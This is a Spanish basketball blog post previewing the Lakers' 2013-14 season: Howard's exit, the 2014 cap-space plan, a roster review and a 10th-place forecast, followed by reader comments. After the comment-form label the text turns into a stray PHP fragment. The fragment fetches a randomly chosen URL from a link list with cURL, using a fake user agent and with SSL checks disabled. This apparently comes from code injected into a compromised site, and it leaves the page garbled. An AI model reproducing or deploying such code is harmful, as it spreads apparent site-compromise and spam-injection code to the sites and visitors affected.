Los Angeles Lakers: Plan Renove 2014

13 de October de 2013 por Love Denise

Un año atrás nadie podía imaginarse la situación en la que se encuentran los Lakers ahora mismo.

Con los fichajes de Howard, Nash y Jamison y la continuidad de Kobe, Pau y Metta World Peace, los Lakers conseguían reunir una de las más potentes plantillas de los últimos años, lo que inmediatamente les catapultaba como candidatos nº1 al anillo. Pero como ya sabéis todos, las cosas se torcieron desde el primer minuto.

Mike Brown no duró más de cinco partidos y su relevo lo tomó D’Antoni. La incorporación de Mr. Pringles no fue la panacea y cuando los Lakers hicieron pop ya no hubo stop. A la plaga de lesiones sufridas por todo el equipo durante la campaña, se unió la actitud inmadura e infantil de Howard, que culminó en unos piques absurdos con la estrella del equipo Kobe Bryant, y una mala gestión de recursos por parte del entrenador mareando continuamente a sus jugadores. Meeks y Jamison aparecían y desaparecían de las rotaciones, Pau jugaba más alejado del aro que nunca, Ebanks se pasaba un año en blanco misteriosamente y Kobe era sobreexplotado en pista,  lo que se convirtió en uno de los factores de su grave lesión en el tendón de Aquiles justo antes de empezar los Playoffs. En postemporada, los Spurs no tuvieron ningún problemas para barrer a los californianos.

Precisamente, en el último partido de la temporada, lo peor no fue el meneo que los texanos estaban dando a unos Lakers plagados de bajas sino el claro distanciamiento de Dwight Howard con la franquicia angelina. El pívot se borró del partido autoexpulsándose y, camino del vestuario, ni corto ni perezoso, increpó al GM Mitch Kupchak.

Unas semanas después,  Dwight Howard rechazaba la oferta de renovación por 120 millones en 5 años que le ofrecían los Lakers para comandar y liderar la nave de los Rockets por 88 millones en 4 años. A su paso, fue dejando un reguero de comentarios despectivos sobre la franquicia angelina y especialmente hacia Bryant, con quien nunca llegó a tener una buena relación.

Sin Howard,  los agentes libres Antawn Jamison, Earl Clark y Devin Ebanks también abandonaron el barco. El primero buscando el anillo que dé sentido a su excelsa carrera NBA; el segundo, el contrato más jugoso posible; y el tercero, una oportunidad para demostrar su calidad. Por último, también salió del equipo el nunca indiferente Metta World Peace, amnistiado por los angelinos para ahorrarse una buena suma de dinero en multas por sobrepasar el limite salarial.

En tales circunstancias, con Kobe lesionado todavía para un tiempo y con un equipo hipotecado salarialmente sin apenas margen de maniobra, era descabellado pensar que esta temporada los californianos pudieran pelear por el anillo pero una franquicia tan grande, glamourosa y mítica como esta, no puede dejarse llevar y caer en las tentaciones del tanking y de Wiggins, por lo que, sin descuidar este año, Kupchak ha puesto en marcha el Plan Renove 2014.

La idea es clara, pasar un año de transición con dignidad y dejando la mejor imagen posible para asaltar el mercado de agentes libres el verano que viene, donde se podrán adquirir piezas como LeBron, Melo, Wade, Randolph o Rudy Gay entre otros. Para ello, todos los movimientos han ido concienzudamente encaminados a obtener el mayor espacio salarial posible para el próximo verano. Así, los Lakers han conseguido firmar a jugadores buenos y baratos teniendo en cuenta el objetivo marcado y prácticamente por el mínimo ha llegado gente como Nick Young, Wesley Johnson, Jordan Farmar o Shawne Williams. Todos ellos firmados por una temporada a los que hay que sumar a Chris Kaman, el sustituto de Howard que llega a L.A. a cambio de algo más de 3 millones.

De esta forma, Nash se ha convertido en el único jugador que tiene contrato en vigor para la 2014-2015.

La idea no es mala ni mucho menos y creemos que Kupchak ha hecho un buen trabajo en los despachos. Quizás la única pega que podamos sacar es que por el camino no han podido hacerse con ningún jugador joven que ilusione a la parroquia púrpura y oro durante este año de barbecho. Salvo el rookie Ryan Kelly elegido en la segunda ronda del Draft (y cuyo rol no parece muy importante a priori) todo lo demás que ha llegado son jugadores de usar y tirar, firmados como hemos dicho por un año para cumplir con el expediente y poco más, sin apenas margen de mejora.

El equipo volverá a ser dirigido por D’Antoni, quien fue ratificado por Kupchak este verano mientras los herederos de Jerry Buss se tiraban los trastos a la cabeza. En este sentido, creemos que no corren buenos tiempos para la marca Lakers y la paz institucional mantenida bajo el mandato del Dr. Buss se verá alteradas tras su muerte por sus hijos: el incompetente e inepto Jim y la empalagosa y casposa Jenny.

Los Lakers cuentan con una plantilla descompensada y, viendo como está el Oeste, mi sensación es que se van a quedar sin Playoffs. Atrás carecen de buenos jugadores defensivos y teniendo en cuenta que con D’Antoni la defensa no se trabaja mucho, presuponemos que van a ser un coladero, uno de los equipos que más puntos reciban. Delante el equipo sí tiene buenas armas, aunque el arsenal está viejo y gastado. Sus 3 referencias ofensivas, (Bryant, Pau y Nash) suman 107 años y ninguno de ellos vienen de un año sano precisamente. Especialmente habrá que estar atentos al nivel al que vuelve Kobe tras su grave lesión.

El equipo queda configurado de la siguiente manera:

Bases: Steve Nash será el eje que mueva a Lakers. A pesar de su edad y todos los problemas físicos sufridos la pasada campaña acabó yéndose a casi 13 puntos y 7 asistencias de media. Eso sí, en defensa ya no está el hombre como para perseguir a Paul, Westbrook o Parker. Tanto si eres fan de Lakers como si no, debemos ver partidos de los angelinos simplemente para disfrutar de los últimos coletazos del magnífico base canadiense, uno de esos jugadores que no deberían retirarse nunca.

Por detrás de Nash, los Lakers cuentan con dos aceptables bases pero que no suplen las carencias defensivas que presenta Nash: Steve Blake y Jordan Farmar. El primero cuajó buenos partidos el pasado año cuando tuvo que asumir mayores responsabilidades debido a las lesiones pero su nivel defensivo es aún peor que el de Nash. El segundo regresa a Lakers tras dos temporadas en Europa, donde jugó a un buen nivel.

Escoltas: Kobe Bryant volverá a liderar una vez más el equipo tanto en pista como fuera de ella. Tras la grave lesión sufrida, su rendimiento será más que nunca el termómetro del equipo. Si vuelve a un buen nivel, los Lakers podrían estar peleando por las últimas plazas de Playoffs. Si por el contrario su nivel no es óptimo o recayese, los Lakers pasarían a ser uno de los 5 peores equipos de la liga. Su suplente será el triplista Jodie Meeks, un decente desatascador desde el arco y que aporta la amenaza exterior que todo equipo necesita. Sin contrato garantizado están dos escoltas como Xavier Henry y Darius Johnson-Odom. El primero lo está haciendo bastante bien de momento en los partidos de pretemporada y suponemos que de seguir así, finalmente tendrá un hueco en el roster definitivo. El segundo probablemente será cortado antes de empezar la liga.

Aleros: Nick Young será el alero titular y una de las referencias ofensivas del equipo especialmente cuando Kobe no esté en pista. Se trata de un gran anotador pero irregular, inconsistente y con una mala selección de tiro. Un jugador desconcertante y unidimensional que cuando tiene la muñeca caliente parece el mismo Bryant pero que al día siguiente no le entra una y por tanto ya no aporta más utilidad al juego. No obstante, es un gran acierto el hacerse con un jugador como este por el mínimo. Su suplente será Wesley Johnson, quien no ha demostrado su valía como pick nº 4 del Draft 2010. Su juego durante sus 3 años en la liga ha sido paupérrimo y sus estancias tanto en Minnessota como en Phoenix han acabado en rotundos fracasos. A poco que se muestre un poco más acertado de cara al aro, se considerará un buen fichaje porque es complicado que pueda hacerlo peor de lo que lo ha hecho estos años. Y por último, ¿que pensarían si con 28 años y tras jugar en el Maratonistas de Coamo de Puerto Rico, en Manresa, en los Shangai Sharks de la Liga China y en el Bucaneros de Venezuela, suena el teléfono y te habla un señor en representación de los Lakers ofreciéndote un contrato? Lo lógico es que pensáramos que se trata de una broma sin gracia hecha por algún colega con ganas de burlarse de ti. Pues no, Marcus Landry es un tipo con suerte y tras jugar en estas ligas menores ha pasado a entrenarse con Kobe, Pau y compañía. Lo reconozco, me siento incapaz de comentar qué puede aportar este buen hombre a la familia lakeriana. Juzgad por vosotros mismos y tened el teléfono encendido por si os llama Kupchak…

Ala-Pívots:  Pau Gasol, a pesar de los rumores de traspaso y amnistía, será el referente ofensivo en la pintura angelina. El año pasado cuajó la peor campaña de su carrera, en parte por problemas físicos que le impidieron jugar más de 30 partidos, y en parte por jugar más alejado del aro para hacerle sitio a Howard en el esquema de juego. Tras la salida de Superman, el español recupera el estatus de escudero de Bryant y deberá asumir  un rol mucho más protagonista. También se moverá en zonas más cercanas a canasta y probablemente alternará la posición de 4 y 5.

Como alternativa está Jordan Hill. Un buen jugador de equipo capaz de producir mucho en pocos minutos y que al igual que Pau se moverá entre el 4 y el 5.

Completando el power-forward tenemos a tres jugadores con contratos no garantizados. Son Ryan Kelly, el típico blanquito con buena mano y poco físico, elegido en el puesto 44 del último Draft;  Shawne Williams,  quien podría ser un buen jugador si dejara las drogas y los asuntos turbios, y Elias Harris, un alemán que ha dejado buenos números en la Universidad de Gonzaga.

Si tuviese que elegir, me quedaría con Kelly y Williams (si está centrado) y cortaría a Harris.

Pivots: El sustituto de Howard será Chris Kaman. Se trata de uno de esos jugadores a los que la vejez le llega de repente. A sus 31 años, Kaman presenta un estado físico lamentable. En ataque aún es un jugador aprovechable porque conserva algunos movimientos del jugador All-Star que fue hace 3 años y tiene la veteranía necesaria para colocarse y rebañar balones. En defensa, en cambio, su cintura de hierro, su agilidad de abuelo de geriátrico y su inexistente velocidad de desplazamiento lateral le convierten en una de las abuelas de Las Chicas de Oro a pesar de su aspecto de Hombre de Cromagnon.

En el fondo del armario, los Lakers tendrán a Robert Sacre, cuyas presencias en pista se limitarán a minutos de la basura.

ALTAS: Nick Young, Kaman, Farmar, Wesley Johnson
ALTAS pero con contratos aun no garantizados:  Xavier Henry, Marcus Landry, Shawne Williams, Ryan Kelly, Elias Harris y DariusJohnson-Odom.

BAJAS: Howard, Metta WP, Jamison, Clark, Ebanks, Duhon, Morris, Goudelock.

Quinteto: Steve Nash, Kobe Bryant, Nick Young, Pau Gasol, Chris Kaman
6º Hombre: Jordan Hill

Pronóstico: 10º del Oeste (39-43). Fuera de Playoffs.

Comenta

9 comentarios a esta entrada

  1. Simon dice:
    #1

    He leido David Ebanks y demostrar calidad??? jejejejejeje.
    Gran análisis Denise. Yo creo que este año los Lakers van a ser justo lo contrario al pasado año. Todo va a fluir a la perfección. La pareja Pau y Hill va a funcionar y Nash va a tener un buen nivel. Este año me da que remando todos en la misma dirección pueden hacer cositas pero su techo no está mucho mas allá de colarse en PO y ahí dar alguna sorpresa pero nada más…

      Citar

  2. Denise dice:
    #2

    Simon:
    He leido David Ebanks y demostrar calidad???jejejejejeje.
    Gran análisis Denise. Yo creo que este año los Lakers van a ser justo lo contrario al pasado año. Todo va a fluir a la perfección. La pareja Pau y Hill va a funcionar y Nash va a tener un buen nivel. Este año me da que remando todos en la misma dirección pueden hacer cositas pero su techo no está mucho mas allá de colarse en PO y ahí dar alguna sorpresa pero nada más…

    Lo poco que los Lakers nos han dejado ver de Ebanks a mi me ha gustado. Buen defensor y un tio fuerte y atletico, que si le dan confianza y minutos es un jugador de rotación muy valido. Estuvo en el verano haciendo workouts con los Magic y que pena que al final se decantase por Dallas.

      Citar

  3. Jose Luis dice:
    #3

    A mi ebanks tampoco me parece nada malo, rapido, largo para defender, y en el tiro no es tan malo. En transición será bastante bueno. Me hubiera gustado para los Magic, si 🙂

      Citar

  4. Txusma dice:
    #4

    Desde mi punto de vista, Kobe haría muy mal si forzara lo más mínimo para volver aunque eso signifique no clasificarse para Playoffs. De todas maneras, y aún con Kobe, no les doy muchas opciones pq la segunda unidad debe ser de las peores de toda la NBA.

      Citar

  5. Jose Luis dice:
    #5

    Desde luego, yo si fuera Kobe, poco forzaría. Ojalá cogiesen un top 5 del draft y listo, la siguiente temporada será, en esta no van a nada.

      Citar

  6. Denise dice:
    #6

    Hoy varios medios se hacen eco de que ni Kobe ni Pau tienen previsto darse un buen recorte en sus salarios el verano que viene. Vamos, que si hacen un buen año, supongo que pediran más de 15 kilos cada uno.
    Yo esas cosas no las entiendo, si ambos están a gusto con la franquicia y la ciudad, y ya han ganado dinero suficiente para 15 generaciones posteriores y el año que viene solo en publicidad pueden ganar 10 millones o más extra. ¿Tan dificil es renovar por 5-6 kilos y poderse rodear de un puñado de buenos jugadores?

      Citar

  7. nba dice:
    #7

    Pues yo creo que Sacre le va a comer la tostada a Kaman precisamente por su velocidad/juventud y por la propension de lesiones de Kaman, la temporada discurrira con una derrota calamitosa tras otra, salvo que Kobe llame al orden a sus lugartenientes y se pongan a defender en equipo, sino vaticino que estaran peleando el puesto con los Suns.

      Citar

  8. Viva_Dirk dice:
    #8

    Denise:

    Hoy varios medios se hacen eco de que ni Kobe ni Pau tienen previsto darse un buen recorte en sus salarios el verano que viene. Vamos, que si hacen un buen año, supongo que pediran más de 15 kilos cada uno.
    Yo esas cosas no las entiendo, si ambos están a gusto con la franquicia y la ciudad, y ya han ganado dinero suficiente para 15 generaciones posteriores y el año que viene solo en publicidad pueden ganar 10 millones o más extra. ¿Tan dificil es renovar por 5-6 kilos y poderse rodear de un puñado de buenos jugadores?

    A mi siempre me ha parecido una barbaridad lo que de cobren menos para rodearse de gente mejor. Vamos plantearle a Kobe o Pau que tienen que cobrar 6 kilos al año para poder optar al anillo me parece de risa. Podria ser que en vez de cobrar el máximo que no se cual es, aceptasen cobrar un 15 o un 20% menos y ya me parece un dineral, siempre que tengan otras ofertas mayores claro

    Nadie se ha rebajado el salario a la mitad en un nuevo contrato por facilitar la labor de la franquicia mientras estaba en la élite de la liga.

      Citar

  9. GreenPride dice:
    #9

    Bueno pues ya estamos mirando a la cara a una nueva temporada NBA.
    Año de clarísima transición para los Lakers. Creo que no hay que ser muy listo para ver que todos los movimientos de Kupchack van encaminados a tener todo el espacio salarial libre para convencer a al menos dos de los agentes libres de relumbrón del verano que viene (yo apuesto por Melo y algún interior).
    Mientras tanto tienen un equipo con algunos jugadores todavía de gran calidad aunque en la cuesta abajo de sus carreras y un banquillo más que dudoso. Yo creo que su rendimiento va a depender del nivel físico de sus tres mejores y veteranos jugadores: Kobe, Pau y Nash. Si los tres están bien y aguantan la temporada a un nivel alto podrían aspirar a las posición 6, 7 u 8 del Oeste pero si cualquiera de ellos no puede aguantar el año se quedarán fuera de PO. Año difícil para los de LA pero ya se sabe que esta franquicia tiene cierta ventaja a la hora de reclutar agentes libres y este verano es de traca así que veremos,…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>